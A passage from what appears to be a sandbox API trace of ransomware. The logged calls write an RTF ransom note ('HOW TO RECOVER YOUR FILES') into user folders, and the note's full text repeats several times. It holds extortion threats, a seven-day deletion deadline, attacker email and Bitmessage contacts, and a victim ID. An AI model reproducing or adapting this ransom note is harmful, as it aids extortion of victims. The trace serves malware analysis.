reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.344] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.344] CloseHandle (hObject=0x294) returned 1 [0273.345] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\#readme_eman#.rtf")) returned 0xffffffff [0273.345] GetLastError () returned 0x2 [0273.345] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. 